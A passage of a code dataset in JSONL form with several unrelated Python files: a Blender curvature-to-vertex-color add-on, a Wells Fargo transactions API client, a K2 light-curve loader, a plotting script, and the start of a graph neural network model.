{"api_name": "logging.Formatter", "line_number": 16, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 17, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 19, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "539519520", "text": "# -*- coding: utf-8 -*-\n\n# ##### BEGIN GPL LICENSE 
BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\nbl_info = {\n \"name\": \"Curvature to vertex colors\",\n \"category\": \"Object\",\n \"description\": \"Set object vertex colors according to mesh curvature\",\n \"author\": \"Tommi Hyppänen (ambi)\",\n \"location\": \"3D View > Object menu > Curvature to vertex colors\",\n \"version\": (0, 1, 7),\n \"blender\": (2, 79, 0)\n}\n\nimport bpy\nimport random\nfrom collections import defaultdict\nimport mathutils\nimport math\nimport numpy as np\nimport cProfile, pstats, io\n\n\ndef read_verts(mesh):\n mverts_co = np.zeros((len(mesh.vertices)*3), dtype=np.float)\n mesh.vertices.foreach_get(\"co\", mverts_co)\n return np.reshape(mverts_co, (len(mesh.vertices), 3)) \n\n\ndef read_edges(mesh):\n fastedges = np.zeros((len(mesh.edges)*2), dtype=np.int) # [0.0, 0.0] * len(mesh.edges)\n mesh.edges.foreach_get(\"vertices\", fastedges)\n return np.reshape(fastedges, (len(mesh.edges), 2))\n\n\ndef read_norms(mesh):\n mverts_no = np.zeros((len(mesh.vertices)*3), dtype=np.float)\n mesh.vertices.foreach_get(\"normal\", mverts_no)\n return np.reshape(mverts_no, (len(mesh.vertices), 3))\n\n\ndef safe_bincount(data, weights, dts, conn):\n bc = np.bincount(data, weights)\n dts[:len(bc)] += bc\n bc = np.bincount(data)\n conn[:len(bc)] += bc\n return (dts, conn)\n\n\nclass CurvatureOperator(bpy.types.Operator):\n \"\"\"Curvature to vertex colors\"\"\"\n bl_idname = \"object.vertex_colors_curve\"\n bl_label = \"Curvature to vertex colors\"\n bl_options = {'REGISTER', 'UNDO'}\n\n typesel = bpy.props.EnumProperty(\n items=[\n (\"RED\", \"Red/Green\", \"\", 1),\n (\"GREY\", \"Grayscale\", \"\", 2),\n (\"GREYC\", \"Grayscale combined\", \"\", 3),\n ],\n name=\"Output style\",\n default=\"RED\")\n \n concavity = bpy.props.BoolProperty(\n name=\"Concavity\",\n default=True,\n options={'HIDDEN'})\n convexity = bpy.props.BoolProperty(\n name=\"Convexity\",\n default=True,\n options={'HIDDEN'})\n \n def curveUpdate(self, context):\n if self.curvesel == \"CAVITY\":\n self.concavity = True\n self.convexity = False\n if self.curvesel == \"VEXITY\":\n self.concavity = False\n self.convexity = True\n if self.curvesel == \"BOTH\":\n self.concavity = True\n self.convexity = True\n \n curvesel = bpy.props.EnumProperty(\n items=[\n (\"CAVITY\", \"Concave\", \"\", 1),\n (\"VEXITY\", \"Convex\", \"\", 2),\n (\"BOTH\", \"Both\", \"\", 3),\n ],\n name=\"Curvature type\",\n default=\"BOTH\",\n update=curveUpdate)\n \n intensity_multiplier = bpy.props.FloatProperty(\n name=\"Intensity Multiplier\",\n min=0.0,\n default=1.0)\n \n smooth = bpy.props.IntProperty(\n name=\"Smoothing steps\",\n min=0,\n max=200,\n default=2)\n\n invert = bpy.props.BoolProperty(\n name=\"Invert\",\n default=False)\n\n @classmethod\n def poll(cls, context):\n ob = context.active_object\n return ob is 
not None and ob.mode == 'OBJECT'\n\n def set_colors(self, mesh, fvals):\n # Use 'curvature' vertex color entry for results\n if \"Curvature\" not in mesh.vertex_colors:\n mesh.vertex_colors.new(name=\"Curvature\")\n \n color_layer = mesh.vertex_colors['Curvature']\n mesh.vertex_colors[\"Curvature\"].active = True\n\n retvalues = []\n \n if self.typesel == \"GREY\":\n splitter = fvals>0.5\n a_part = splitter * (fvals*2-1)*self.concavity\n b_part = np.logical_not(splitter) * (1-fvals*2)*self.convexity\n fvals = a_part + b_part\n fvals *= self.intensity_multiplier\n if self.invert:\n fvals = 1.0 - fvals\n \n retvalues = np.ones((len(fvals), 4))\n retvalues[:,0] = fvals\n retvalues[:,1] = fvals\n retvalues[:,2] = fvals\n \n if self.typesel == \"GREYC\":\n if not self.convexity:\n fvals = np.where(fvals<0.5, 0.5, fvals)\n if not self.concavity:\n fvals = np.where(fvals>0.5, 0.5, fvals)\n if not self.invert:\n fvals = 1.0 - fvals\n fvals = (fvals-0.5)*self.intensity_multiplier+0.5\n retvalues = np.ones((len(fvals), 4))\n retvalues[:,0] = fvals\n retvalues[:,1] = fvals\n retvalues[:,2] = fvals\n \n if self.typesel == \"RED\":\n splitter = fvals>0.5\n a_part = splitter * (fvals*2-1)*self.concavity\n b_part = np.logical_not(splitter) * (1-fvals*2)*self.convexity\n retvalues = np.ones((len(fvals), 4))\n if self.invert:\n retvalues[:,0] = 1.0 - a_part * self.intensity_multiplier\n retvalues[:,1] = 1.0 - b_part * self.intensity_multiplier\n else:\n retvalues[:,0] = a_part * self.intensity_multiplier\n retvalues[:,1] = b_part * self.intensity_multiplier \n retvalues[:,2] = np.zeros((len(fvals)))\n\n # write vertex colors\n mloops = np.zeros((len(mesh.loops)), dtype=np.int)\n mesh.loops.foreach_get(\"vertex_index\", mloops)\n color_layer.data.foreach_set(\"color\", retvalues[mloops].flatten())\n \n return None\n\n\n def calc_normals(self, mesh, fastverts, fastnorms, fastedges):\n # FIXME: FAILS AT INVALID INPUT MESH\n # If there are any loose or disconnected vertices or edges, the output will be black\n # HOWTO cleanup:\n # 1. Remove doubles\n # 2. 
Delete loose\n\n        edge_a, edge_b = fastedges[:,0], fastedges[:,1]\n        \n        tvec = fastverts[edge_b] - fastverts[edge_a]\n        tvlen = np.linalg.norm(tvec, axis=1)    \n\n        tvec = (tvec.T / tvlen).T # normalize vectors\n\n        # adjust the minimum of what is processed   \n        edgelength = tvlen * 100 \n        edgelength = np.where(edgelength<1, 1.0, edgelength)\n\n        vecsums = np.zeros(fastverts.shape[0], dtype=np.float) \n        connections = np.zeros(fastverts.shape[0], dtype=np.float) \n\n        # calculate normal differences to the edge vector in the first edge vertex\n        totdot = (np.einsum('ij,ij->i', tvec, fastnorms[edge_a]))/edgelength\n        #for i, v in enumerate(edge_a):\n        #    vecsums[v] += totdot[i]\n        #    connections[v] += 1\n        safe_bincount(edge_a, totdot, vecsums, connections)\n\n        # calculate normal differences to the edge vector in the second edge vertex\n        totdot = (np.einsum('ij,ij->i', -tvec, fastnorms[edge_b]))/edgelength\n        safe_bincount(edge_b, totdot, vecsums, connections)\n\n        # (approximate gaussian) curvature is the average difference of \n        # edge vectors to surface normals (from dot product cosine equation)\n        curve = 1.0 - np.arccos(vecsums/connections)/np.pi\n\n        # 1 = max curvature, 0 = min curvature, 0.5 = zero curvature\n        curve -= 0.5\n        curve /= np.max([np.amax(curve), np.abs(np.amin(curve))])\n        curve += 0.5\n        return curve\n    \n    def mesh_smooth_filter_variable(self, mesh, data, fastverts, fastedges):\n        # vert indices of edges\n        edge_a, edge_b = fastedges[:,0], fastedges[:,1]\n        tvlen = np.linalg.norm(fastverts[edge_b] - fastverts[edge_a], axis=1)\n        edgelength = np.where(tvlen<1, 1.0, tvlen)\n\n        data_sums = np.zeros(fastverts.shape[0], dtype=np.float) \n        connections = np.zeros(fastverts.shape[0], dtype=np.float) \n\n        # the longer the edge distance to the datapoint, the less influence it has\n\n        # step 1\n        per_vert = data[edge_b]/edgelength\n        safe_bincount(edge_a, per_vert, data_sums, connections)\n        eb_smooth = data_sums/connections\n        \n        per_vert = eb_smooth[edge_a]/edgelength\n        safe_bincount(edge_b, per_vert, data_sums, connections)\n\n        new_data = data_sums/connections\n\n        # step 2\n        data_sums = np.zeros(data_sums.shape)\n        connections = np.zeros(connections.shape)\n\n        per_vert = data[edge_a]/edgelength\n        safe_bincount(edge_b, per_vert, data_sums, connections)\n        ea_smooth = data_sums/connections\n        \n        per_vert = ea_smooth[edge_b]/edgelength\n        safe_bincount(edge_a, per_vert, data_sums, connections)\n\n        new_data += data_sums/connections\n\n        # limit between -1 and 1\n        new_data /= np.max([np.amax(new_data), np.abs(np.amin(new_data))])\n\n        return new_data\n\n\n    def execute(self, context):          \n        mesh = context.active_object.data\n        fastverts = read_verts(mesh)\n        fastedges = read_edges(mesh)\n        fastnorms = read_norms(mesh) \n\n        angvalues = self.calc_normals(mesh, fastverts, fastnorms, fastedges)\n        if self.smooth > 0:\n            angvalues -= 0.5\n            angvalues *= 2.0\n            for _ in range(self.smooth):\n                angvalues = self.mesh_smooth_filter_variable(mesh, angvalues, fastverts, fastedges)\n            angvalues /= 2.0\n            angvalues += 0.5\n           \n        self.set_colors(mesh, angvalues)    \n        \n        return {'FINISHED'}\n\ndef add_object_button(self, context):  \n    self.layout.operator(  \n        CurvatureOperator.bl_idname,  \n        text=CurvatureOperator.__doc__,  \n        icon='MESH_DATA')  \n\ndef register():\n    bpy.utils.register_class(CurvatureOperator)\n    bpy.types.VIEW3D_MT_object.append(add_object_button)  \n\ndef unregister():\n    bpy.utils.unregister_class(CurvatureOperator)\n    bpy.types.VIEW3D_MT_object.remove(add_object_button)\n\ndef profile_debug():\n    pr = cProfile.Profile()\n    pr.enable()\n    
bpy.ops.object.vertex_colors_curve()\n pr.disable()\n s = io.StringIO()\n sortby = 'cumulative'\n ps = pstats.Stats(pr, stream=s)\n ps.strip_dirs().sort_stats(sortby).print_stats()\n print(s.getvalue())\n\nif __name__ == \"__main__\":\n #unregister()\n register()\n #profile_debug()\n\n", "sub_path": "mesh_curves.py", "file_name": "mesh_curves.py", "file_ext": "py", "file_size_in_byte": 10846, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.zeros", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.reshape", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.reshape", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 53, "usage_type": "attribute"}, {"api_name": "numpy.reshape", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 61, "usage_type": "call"}, {"api_name": "bpy.types", "line_number": 66, "usage_type": "attribute"}, {"api_name": "bpy.props.EnumProperty", "line_number": 72, "usage_type": "call"}, {"api_name": "bpy.props", "line_number": 72, "usage_type": "attribute"}, {"api_name": "bpy.props.BoolProperty", "line_number": 81, "usage_type": "call"}, {"api_name": "bpy.props", "line_number": 81, "usage_type": "attribute"}, {"api_name": "bpy.props.BoolProperty", "line_number": 85, "usage_type": "call"}, {"api_name": "bpy.props", "line_number": 85, "usage_type": "attribute"}, {"api_name": "bpy.props.EnumProperty", "line_number": 101, "usage_type": "call"}, {"api_name": "bpy.props", "line_number": 101, "usage_type": "attribute"}, {"api_name": "bpy.props.FloatProperty", "line_number": 111, "usage_type": "call"}, {"api_name": "bpy.props", "line_number": 111, "usage_type": "attribute"}, {"api_name": "bpy.props.IntProperty", "line_number": 116, "usage_type": "call"}, {"api_name": "bpy.props", "line_number": 116, "usage_type": "attribute"}, {"api_name": "bpy.props.BoolProperty", "line_number": 122, "usage_type": "call"}, {"api_name": "bpy.props", "line_number": 122, "usage_type": "attribute"}, {"api_name": "numpy.logical_not", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 182, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 199, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 207, "usage_type": "attribute"}, 
{"api_name": "numpy.zeros", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 208, "usage_type": "attribute"}, {"api_name": "numpy.einsum", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 223, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 234, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 234, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 237, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 238, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 266, "usage_type": "call"}, {"api_name": "bpy.utils.register_class", "line_number": 297, "usage_type": "call"}, {"api_name": "bpy.utils", "line_number": 297, "usage_type": "attribute"}, {"api_name": "bpy.types.VIEW3D_MT_object.append", "line_number": 298, "usage_type": "call"}, {"api_name": "bpy.types", "line_number": 298, "usage_type": "attribute"}, {"api_name": "bpy.utils.unregister_class", "line_number": 301, "usage_type": "call"}, {"api_name": "bpy.utils", "line_number": 301, "usage_type": "attribute"}, {"api_name": "bpy.types.VIEW3D_MT_object.remove", "line_number": 302, "usage_type": "call"}, {"api_name": "bpy.types", "line_number": 302, "usage_type": "attribute"}, {"api_name": "cProfile.Profile", "line_number": 305, "usage_type": "call"}, {"api_name": "bpy.ops.object.vertex_colors_curve", "line_number": 307, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 307, "usage_type": "attribute"}, {"api_name": "io.StringIO", "line_number": 309, "usage_type": "call"}, {"api_name": "pstats.Stats", "line_number": 311, "usage_type": "call"}]} +{"seq_id": "635934886", "text": "from ..core.constants import (\n TRANS_APPROVED,\n TRANS_TYPE_AUTH,\n TRANS_TYPE_CANCEL_AUTH,\n # TRANS_TYPE_CHARGE,\n # TRANS_TYPE_AUTH_AND_CHARGE,\n TRANS_TYPE_AUTH_AND_CHARGE_TIMEOUT_REVERSAL,\n TRANS_TYPE_RETURN_CREDIT,\n TRANS_TYPE_VOID_SALE,\n TRANS_TYPE_VOID_RETURN,\n)\nfrom wellsfargo.core.exceptions import TransactionDenied\nfrom ..models import APIMerchantNum, FinancingPlan, TransferMetadata\nfrom ..utils import as_decimal\nfrom .client import WFRSGatewayAPIClient\nimport uuid\n\n\nclass TransactionsAPIClient(WFRSGatewayAPIClient):\n def __init__(self, current_user=None):\n self.current_user = current_user\n\n def submit_transaction(self, trans_request, transaction_uuid=None, persist=True):\n api_path = self.get_api_path(trans_request)\n creds = APIMerchantNum.get_for_user(self.current_user)\n # Submit 
transaction to WFRS\n trans_request_data = {\n \"locale\": trans_request.locale,\n \"authorization_number\": trans_request.auth_number,\n \"account_number\": trans_request.account_number,\n \"plan_number\": str(trans_request.plan_number),\n \"amount\": str(trans_request.amount),\n \"ticket_number\": trans_request.ticket_number,\n \"merchant_number\": creds.merchant_num,\n }\n if transaction_uuid is None:\n transaction_uuid = uuid.uuid4()\n resp = self.api_post(\n api_path, client_request_id=transaction_uuid, json=trans_request_data\n )\n resp.raise_for_status()\n resp_data = resp.json()\n # Find the related plan\n plan_number = resp_data.get(\"plan_number\", trans_request.plan_number)\n plan, _ = FinancingPlan.objects.get_or_create(plan_number=plan_number)\n # Persist transaction data and WF specific metadata\n transfer = TransferMetadata()\n transfer.user = trans_request.user\n transfer.merchant_name = creds.name\n transfer.merchant_num = creds.merchant_num\n transfer.account_number = resp_data.get(\n \"account_number\", trans_request.account_number\n )\n transfer.merchant_reference = transaction_uuid\n transfer.amount = as_decimal(resp_data.get(\"amount\", trans_request.amount))\n transfer.type_code = trans_request.type_code\n transfer.ticket_number = resp_data.get(\n \"ticket_number\", trans_request.ticket_number\n )\n transfer.financing_plan = plan\n transfer.auth_number = resp_data.get(\n \"authorization_number\", trans_request.auth_number\n )\n transfer.status = resp_data[\"transaction_status\"]\n transfer.message = resp_data.get(\"status_message\", \"\")\n transfer.disclosure = resp_data.get(\"disclosure\", \"\")\n if persist:\n transfer.save()\n # Check for approval\n if transfer.status != TRANS_APPROVED:\n exc = TransactionDenied(\"%s: %s\" % (transfer.status, transfer.message))\n exc.status = transfer.status\n raise exc\n # Return the transfer metadata\n return transfer\n\n def get_api_path(self, trans_request):\n actions = {\n TRANS_TYPE_AUTH: \"authorization\",\n TRANS_TYPE_CANCEL_AUTH: \"cancel-authorization\",\n # TRANS_TYPE_CHARGE: 'charge',\n # TRANS_TYPE_AUTH_AND_CHARGE: 'authorization-charge',\n TRANS_TYPE_AUTH_AND_CHARGE_TIMEOUT_REVERSAL: \"timeout-authorization-charge\",\n TRANS_TYPE_RETURN_CREDIT: \"return\",\n TRANS_TYPE_VOID_SALE: \"void-sale\",\n TRANS_TYPE_VOID_RETURN: \"void-return\",\n }\n action = actions.get(trans_request.type_code)\n if action is None:\n raise ValueError(\"Unexpected transaction type: %s\" % action)\n api_path = \"/credit-cards/private-label/new-accounts/v2/payment/transactions/{action}\".format(\n action=action\n )\n return api_path\n", "sub_path": "src/wellsfargo/connector/transactions.py", "file_name": "transactions.py", "file_ext": "py", "file_size_in_byte": 3936, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "client.WFRSGatewayAPIClient", "line_number": 19, "usage_type": "name"}, {"api_name": "models.APIMerchantNum.get_for_user", "line_number": 25, "usage_type": "call"}, {"api_name": "models.APIMerchantNum", "line_number": 25, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 37, "usage_type": "call"}, {"api_name": "models.FinancingPlan.objects.get_or_create", "line_number": 45, "usage_type": "call"}, {"api_name": "models.FinancingPlan.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.FinancingPlan", "line_number": 45, "usage_type": "name"}, {"api_name": "models.TransferMetadata", "line_number": 47, "usage_type": 
"call"}, {"api_name": "utils.as_decimal", "line_number": 55, "usage_type": "call"}, {"api_name": "core.constants.TRANS_APPROVED", "line_number": 70, "usage_type": "name"}, {"api_name": "wellsfargo.core.exceptions.TransactionDenied", "line_number": 71, "usage_type": "call"}, {"api_name": "core.constants.TRANS_TYPE_AUTH", "line_number": 79, "usage_type": "name"}, {"api_name": "core.constants.TRANS_TYPE_CANCEL_AUTH", "line_number": 80, "usage_type": "name"}, {"api_name": "core.constants.TRANS_TYPE_AUTH_AND_CHARGE_TIMEOUT_REVERSAL", "line_number": 83, "usage_type": "name"}, {"api_name": "core.constants.TRANS_TYPE_RETURN_CREDIT", "line_number": 84, "usage_type": "name"}, {"api_name": "core.constants.TRANS_TYPE_VOID_SALE", "line_number": 85, "usage_type": "name"}, {"api_name": "core.constants.TRANS_TYPE_VOID_RETURN", "line_number": 86, "usage_type": "name"}]} +{"seq_id": "154005726", "text": "import lightkurve as lk\nfrom lightkurve.lightcurve import KeplerLightCurve\nimport os\nfrom typing import Union, List, Callable, Any\n\n\ndef getK2Ids() -> List[int]:\n \"\"\"Retrieves all the Ids\n \n :returns: A list containing all the certified K2 Ids.\n \"\"\"\n with open(\"data/k2_ids.txt\") as ids_file:\n ids = list(map(int, ids_file.readlines()))\n return ids\n\n\ndef getK2Id(index: int = 0) -> int:\n \"\"\"\n :param index: Literally the index you want from the K2 Ids List\n :returns: K2 Id as an Integer\n \"\"\"\n return getK2Ids()[index]\n\n\ndef retrieveK2LightCurve(k2Id: Union[int, str, float]) -> KeplerLightCurve:\n \"\"\"\n :param k2Id: The K2 Id, as an Integer, String or Float\n :returns: A KeplerLightCurve object\n \"\"\"\n k2Id = int(k2Id)\n search_result: lk.SearchResult = lk.search_lightcurve(f'EPIC {k2Id}', mission='K2')\n klc: KeplerLightCurve = search_result.download()\n klc.id = k2Id\n klc.filename = klc.meta[\"FILENAME\"]\n klc.delete = lambda self: os.remove(self.filename)\n return klc\n\n\ndef analyseK2LightCurve(k2Id: Union[int, str, float], func: Callable[[KeplerLightCurve], Any]) -> Any:\n \"\"\"\n :param k2Id: The K2 Id, as an Integer, String or Float\n :param func: The function to be ran, with the modified KeplerLightCurve as a parameter\n :return: Result of func\n \"\"\"\n klc = retrieveK2LightCurve(k2Id)\n result = func(klc)\n klc.delete()\n del klc\n return result\n\n\n__all__ = [\n \"retrieveK2LightCurve\", \"getK2Ids\", \"getK2Id\", \"analyseK2LightCurve\"\n]\n", "sub_path": "kepler/io/k2.py", "file_name": "k2.py", "file_ext": "py", "file_size_in_byte": 1537, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "typing.List", "line_number": 7, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 25, "usage_type": "name"}, {"api_name": "lightkurve.SearchResult", "line_number": 31, "usage_type": "attribute"}, {"api_name": "lightkurve.search_lightcurve", "line_number": 31, "usage_type": "call"}, {"api_name": "lightkurve.lightcurve.KeplerLightCurve", "line_number": 32, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 35, "usage_type": "call"}, {"api_name": "lightkurve.lightcurve.KeplerLightCurve", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 39, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 39, "usage_type": "name"}, {"api_name": "lightkurve.lightcurve.KeplerLightCurve", "line_number": 39, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 39, "usage_type": "name"}]} +{"seq_id": "432129457", "text": 
"import numpy as np\nimport matplotlib.pyplot as plt\n\ninfilename='/home/faiz/SS_2020/Ocean/exercies/03/output.txt'\noutfilename='/home/faiz/SS_2020/Ocean/exercies/03/output.png'\n\n#read labels from first line\nwith open(infilename) as f:\n dataLabels = f.readline().split(',')\n\n#clean labels (whitespace/tab/newline)\nfor s in dataLabels:\n s.lstrip().rstrip()\n\n#read data from row 2 onwoards\n#x[i,:] data i, i=0 is time,...\nx = np.loadtxt(infilename, delimiter=',', unpack=True,skiprows=1)\n\n#plot figure\nfig = plt.figure()\ndataLines=[]\nfor ii in range(1,x.shape[0]):\n lineIi, = plt.plot(x[0,:],x[ii,:], label=dataLabels[ii])\n dataLines.append(lineIi)\n\nplt.xlabel('time')\nplt.ylabel('populations')\nplt.legend(handles=dataLines, loc='best')\n#plt.show()\nfig.savefig(outfilename, bbox_inches='tight')\n\nfig.savefig(\"/home/faiz/SS_2020/Ocean/exercies/preditor-prey-best-example/pred-prey-chicken-fox.pdf\")", "sub_path": "exercies/03/plot.py", "file_name": "plot.py", "file_ext": "py", "file_size_in_byte": 904, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.loadtxt", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "1900919", "text": "import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom sklearn.metrics import f1_score\nfrom sklearn.model_selection import KFold\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nimport torch.optim as optim\n\ndevice = torch.device(\"cuda:0\") if torch.cuda.is_available() else torch.device(\"cpu\")\n\nclass Het_Node():\n def __init__(self, node_type, node_id, embed, neighbor_list_post = [], neighbor_list_user = [], label = None):\n self.node_type = node_type\n self.node_id = node_id\n self.emb = embed\n self.label = label #only post node, user node = default = None\n self.neighbors_user = neighbor_list_user #[(id)]\n self.neighbors_post = neighbor_list_post\n\ndef data_loader(pathway = 'F:/post_nodes/', node_type = \"post\"):\n if node_type == \"post\":\n post_node = []\n post_id = []\n post_label = []\n post_embed = []\n post_p_neigh = []\n post_u_neigh = []\n for i in range(19):\n print(i)\n batch = str(i)\n f = open(pathway + \"batch_\" + batch + '.txt')\n print(pathway + \"batch_\" + batch + '.txt')\n Lines = f.readlines() \n for j in range(len(Lines)):\n if j % 5 == 0:\n _, id_, label = Lines[j].split()\n post_id.append(int(id_))\n post_label.append(int(label))\n embed = []\n if j % 5 == 1 or j % 5 == 2:\n embed.append(list(map(float,Lines[j].split())))\n if j % 5 == 2:\n post_embed.append(embed)\n if j % 5 == 3:\n post_p_neigh.append(list(map(int,Lines[j].split())))\n if j % 5 == 4:\n 
post_u_neigh.append(list(map(int,Lines[j].split())))\n f.close()\n for i in range(len(post_id)):\n node = Het_Node(node_type = \"post\", node_id = post_id[i], embed = post_embed[i], neighbor_list_post = post_p_neigh[i], neighbor_list_user = post_u_neigh[i], label = post_label[i])\n post_node.append(node)\n return post_node\n \n else:\n user_node = []\n user_id = []\n user_embed = []\n f = open(pathway + 'user_nodes.txt')\n Lines = f.readlines() \n for j in range(len(Lines)):\n if j % 3 == 0:\n id_ = Lines[j].split()\n user_id.append(int(id_[0]))\n embed = []\n if j % 3 == 1 or j % 3 == 2:\n embed.append(list(map(float,Lines[j].split())))\n if j % 3 == 2:\n user_embed.append(embed)\n f.close()\n for i in range(len(user_id)):\n node = Het_Node(node_type = \"user\", node_id = user_id[i], embed = user_embed[i])\n user_node.append(node) \n return user_node\n\npost_nodes = data_loader(pathway='F:/FYP_data/normalized_post_nodes/', node_type=\"post\")\nuser_nodes = data_loader(pathway='F:/FYP_data/normalized_user_nodes/', node_type=\"user\")\npost_emb_dict = {}\nuser_emb_dict = {}\nfor user in user_nodes:\n user_emb_dict[user.node_id] = user.emb\nfor post in post_nodes:\n post_emb_dict[post.node_id] = post.emb\n\nclass Het_GNN(nn.Module):\n #features: list of HetNode class\n def __init__(self, input_dim, ini_hidden_dim, hidden_dim, batch_size,\n u_input_dim, u_hidden_dim, u_ini_hidden_dim, u_output_dim, u_num_layers,\n p_input_dim, p_hidden_dim, p_ini_hidden_dim, p_output_dim, p_num_layers,\n out_embed_d, outemb_d,\n u_batch_size = 1, p_batch_size = 1,content_dict={}, num_layers=1, u_rnn_type='LSTM', p_rnn_type='LSTM', rnn_type='LSTM', embed_d = 200):\n super(Het_GNN, self).__init__()\n self.input_dim = input_dim\n self.ini_hidden_dim = ini_hidden_dim\n self.hidden_dim = hidden_dim\n self.batch_size = batch_size\n self.num_layers = num_layers\n self.embed_d = embed_d\n self.u_input_dim = u_input_dim\n self.u_hidden_dim = u_hidden_dim\n self.u_ini_hidden_dim = u_ini_hidden_dim\n self.u_batch_size = u_batch_size\n self.u_output_dim = u_output_dim\n self.u_num_layers = u_num_layers\n self.u_rnn_type = u_rnn_type\n self.p_input_dim = p_input_dim\n self.p_hidden_dim = p_hidden_dim\n self.p_ini_hidden_dim = p_ini_hidden_dim\n self.p_batch_size = p_batch_size\n self.p_output_dim = p_output_dim\n self.p_num_layers = p_num_layers\n self.p_rnn_type = p_rnn_type\n self.out_embed_d = out_embed_d\n self.outemb_d = outemb_d\n #self.features = features\n self.content_dict = content_dict\n self.p_neigh_att = nn.Parameter(torch.ones(embed_d * 2, 1), requires_grad=True)\n self.u_neigh_att = nn.Parameter(torch.ones(embed_d * 2, 1), requires_grad=True)\n # Define the initial linear hidden layer\n self.init_linear_text = nn.Linear(self.input_dim[0], self.ini_hidden_dim[0])\n self.init_linear_image = nn.Linear(self.input_dim[1], self.ini_hidden_dim[1])\n self.init_linear_other = nn.Linear(self.input_dim[2], self.ini_hidden_dim[2])\n # Define the LSTM 